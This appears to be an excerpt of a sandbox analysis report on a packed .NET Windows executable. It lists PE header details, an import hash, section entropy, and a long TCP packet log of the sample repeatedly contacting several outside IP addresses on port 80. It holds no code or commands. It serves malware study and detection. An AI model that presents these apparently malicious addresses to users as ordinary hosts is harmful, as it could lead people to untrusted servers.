                                        Icon Hash:4f81caccccca450f

                                        Static PE Info

                                        General

                                        Entrypoint:0x49e7f6
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x646C2261 [Tue May 23 02:18:09 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9e7a10x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x1788.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9c8540x54.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x9c7fc0x9c800False0.8406845921525559data7.75074663112432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xa00000x17880x1800False0.2804361979166667data4.623505899341017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xa20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xa01600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m
                                        RT_GROUP_ICON0xa12080x14data
                                        RT_GROUP_ICON0xa121c0x14data
                                        RT_VERSION0xa12300x36cdata
                                        RT_MANIFEST0xa159c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 23, 2023 09:39:05.430792093 CEST4972080192.168.2.5130.185.109.77
                                        May 23, 2023 09:39:05.449032068 CEST8049720130.185.109.77192.168.2.5
                                        May 23, 2023 09:39:05.449331999 CEST4972080192.168.2.5130.185.109.77
                                        May 23, 2023 09:39:05.449691057 CEST4972080192.168.2.5130.185.109.77
                                        May 23, 2023 09:39:05.467632055 CEST8049720130.185.109.77192.168.2.5
                                        May 23, 2023 09:39:05.467688084 CEST8049720130.185.109.77192.168.2.5
                                        May 23, 2023 09:39:05.467710972 CEST8049720130.185.109.77192.168.2.5
                                        May 23, 2023 09:39:05.467982054 CEST4972080192.168.2.5130.185.109.77
                                        May 23, 2023 09:39:05.468259096 CEST4972080192.168.2.5130.185.109.77
                                        May 23, 2023 09:39:05.490024090 CEST8049720130.185.109.77192.168.2.5
                                        May 23, 2023 09:39:15.543315887 CEST4972280192.168.2.581.169.145.93
                                        May 23, 2023 09:39:15.563525915 CEST804972281.169.145.93192.168.2.5
                                        May 23, 2023 09:39:15.563677073 CEST4972280192.168.2.581.169.145.93
                                        May 23, 2023 09:39:15.563860893 CEST4972280192.168.2.581.169.145.93
                                        May 23, 2023 09:39:15.584013939 CEST804972281.169.145.93192.168.2.5
                                        May 23, 2023 09:39:15.585316896 CEST804972281.169.145.93192.168.2.5
                                        May 23, 2023 09:39:15.585335016 CEST804972281.169.145.93192.168.2.5
                                        May 23, 2023 09:39:15.585383892 CEST4972280192.168.2.581.169.145.93
                                        May 23, 2023 09:39:17.078563929 CEST4972280192.168.2.581.169.145.93
                                        May 23, 2023 09:39:18.094713926 CEST4972380192.168.2.581.169.145.93
                                        May 23, 2023 09:39:18.115161896 CEST804972381.169.145.93192.168.2.5
                                        May 23, 2023 09:39:18.116151094 CEST4972380192.168.2.581.169.145.93
                                        May 23, 2023 09:39:18.116277933 CEST4972380192.168.2.581.169.145.93
                                        May 23, 2023 09:39:18.136615992 CEST804972381.169.145.93192.168.2.5
                                        May 23, 2023 09:39:18.138227940 CEST804972381.169.145.93192.168.2.5
                                        May 23, 2023 09:39:18.138271093 CEST804972381.169.145.93192.168.2.5
                                        May 23, 2023 09:39:18.138406992 CEST4972380192.168.2.581.169.145.93
                                        May 23, 2023 09:39:19.625525951 CEST4972380192.168.2.581.169.145.93
                                        May 23, 2023 09:39:20.642287970 CEST4972480192.168.2.581.169.145.93
                                        May 23, 2023 09:39:20.660809994 CEST804972481.169.145.93192.168.2.5
                                        May 23, 2023 09:39:20.660909891 CEST4972480192.168.2.581.169.145.93
                                        May 23, 2023 09:39:20.661094904 CEST4972480192.168.2.581.169.145.93
                                        May 23, 2023 09:39:20.679292917 CEST804972481.169.145.93192.168.2.5
                                        May 23, 2023 09:39:20.680449963 CEST804972481.169.145.93192.168.2.5
                                        May 23, 2023 09:39:20.680505991 CEST804972481.169.145.93192.168.2.5
                                        May 23, 2023 09:39:20.680619001 CEST4972480192.168.2.581.169.145.93
                                        May 23, 2023 09:39:20.680876970 CEST4972480192.168.2.581.169.145.93
                                        May 23, 2023 09:39:20.699088097 CEST804972481.169.145.93192.168.2.5
                                        May 23, 2023 09:39:25.771867990 CEST4972580192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:25.942465067 CEST8049725198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:25.944834948 CEST4972580192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:25.948123932 CEST4972580192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:26.119757891 CEST8049725198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:26.202972889 CEST8049725198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:26.203011990 CEST8049725198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:26.203185081 CEST4972580192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:27.454433918 CEST4972580192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:28.470400095 CEST4972680192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:28.641064882 CEST8049726198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:28.641175032 CEST4972680192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:28.641346931 CEST4972680192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:28.811726093 CEST8049726198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:28.894375086 CEST8049726198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:28.894414902 CEST8049726198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:28.894512892 CEST4972680192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:30.535830975 CEST4972680192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:31.762128115 CEST4972780192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:31.932876110 CEST8049727198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:31.933010101 CEST4972780192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:31.933106899 CEST4972780192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:32.103719950 CEST8049727198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:32.186976910 CEST8049727198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:32.187005997 CEST8049727198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:32.187153101 CEST4972780192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:32.187300920 CEST4972780192.168.2.5198.177.124.57
                                        May 23, 2023 09:39:32.357666969 CEST8049727198.177.124.57192.168.2.5
                                        May 23, 2023 09:39:37.276823044 CEST4972880192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:37.293317080 CEST8049728188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:37.301635027 CEST4972880192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:37.319159985 CEST4972880192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:37.335766077 CEST8049728188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:37.335809946 CEST8049728188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:37.345830917 CEST8049728188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:37.346039057 CEST8049728188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:39.854471922 CEST4972980192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:39.870901108 CEST8049729188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:39.876226902 CEST4972980192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:39.884820938 CEST4972980192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:39.901058912 CEST8049729188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:39.921047926 CEST8049729188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:39.921086073 CEST8049729188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:39.927082062 CEST4972980192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:41.389776945 CEST4972980192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:42.396203995 CEST4973080192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:42.412694931 CEST8049730188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:42.415267944 CEST4973080192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:42.415443897 CEST4973080192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:42.431548119 CEST8049730188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:42.440845966 CEST8049730188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:42.440871954 CEST8049730188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:42.441047907 CEST4973080192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:42.441174984 CEST4973080192.168.2.5188.114.97.7
                                        May 23, 2023 09:39:42.457473040 CEST8049730188.114.97.7192.168.2.5
                                        May 23, 2023 09:39:47.749243021 CEST4973180192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:47.958288908 CEST8049731150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:47.958421946 CEST4973180192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:47.958600044 CEST4973180192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:48.167458057 CEST8049731150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:50.578980923 CEST4973280192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:50.792145967 CEST8049732150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:51.437830925 CEST4973280192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:51.651027918 CEST8049732150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:52.234841108 CEST4973280192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:52.448024988 CEST8049732150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:54.531646013 CEST4973280192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:54.748451948 CEST8049732150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:55.250664949 CEST4973280192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:55.464044094 CEST8049732150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:55.969453096 CEST4973280192.168.2.5150.129.40.9
                                        May 23, 2023 09:39:56.182446003 CEST8049732150.129.40.9192.168.2.5
                                        May 23, 2023 09:39:59.901916981 CEST4973380192.168.2.5150.129.40.9
                                        May 23, 2023 09:40:00.125967026 CEST8049733150.129.40.9192.168.2.5
                                        May 23, 2023 09:40:00.641772032 CEST4973380192.168.2.5150.129.40.9
                                        May 23, 2023 09:40:00.867126942 CEST8049733150.129.40.9192.168.2.5
                                        May 23, 2023 09:40:01.376301050 CEST4973380192.168.2.5150.129.40.9
                                        May 23, 2023 09:40:01.600306988 CEST8049733150.129.40.9192.168.2.5
                                        May 23, 2023 09:40:04.493130922 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:04.775171995 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:04.780301094 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:04.780544043 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:05.063987017 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056252003 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056308985 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056329012 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056349039 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056369066 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056392908 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056412935 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056433916 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056453943 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056461096 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.056474924 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.056519032 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.056545019 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.313205004 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.338793039 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338845968 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338865995 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338887930 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338907957 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338927984 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338947058 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338968039 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.338988066 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339009047 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339029074 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339034081 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339050055 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339081049 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339109898 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339152098 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339169979 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339190960 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339205027 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339216948 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339226961 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339237928 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339266062 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339575052 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339613914 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339634895 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339644909 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339683056 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:06.339690924 CEST8049734118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:06.339730024 CEST4973480192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:07.490582943 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:07.770880938 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:07.771084070 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:07.800791025 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:08.081419945 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813437939 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813478947 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813508034 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813533068 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813561916 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813589096 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813615084 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813640118 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813666105 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813663960 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:08.813664913 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:08.813695908 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:08.813745022 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:08.813745022 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.093611956 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093642950 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093663931 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093683958 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093696117 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.093703985 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093724012 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093740940 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.093744993 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093765974 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093780041 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.093835115 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093847036 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.093853951 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093925953 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093945980 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093966961 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093986988 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.093988895 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.094016075 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.094058990 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.094063997 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.094080925 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.094103098 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.094119072 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.094124079 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.094146013 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.094161987 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.094165087 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.094197035 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.315975904 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.373924017 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.373967886 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374012947 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374053955 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374053955 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374098063 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374104023 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374119043 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374140024 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374144077 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374183893 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374185085 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374224901 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374228954 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374270916 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374272108 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374309063 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374311924 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374352932 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374356031 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374396086 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374398947 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374439955 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374444008 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374485016 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374489069 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374524117 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374536037 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374555111 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374567032 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374584913 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374602079 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374614954 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374620914 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374651909 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374655962 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374692917 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374697924 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374737978 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374742031 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374779940 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374784946 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374823093 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374826908 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374865055 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374870062 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374911070 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374914885 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.374953985 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.374958038 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375000000 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375000954 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375042915 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375042915 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375093937 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375099897 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375138044 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375153065 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375174046 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375196934 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375202894 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375216961 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375233889 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375240088 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375264883 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375272036 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375294924 CEST8049735118.27.125.172192.168.2.5
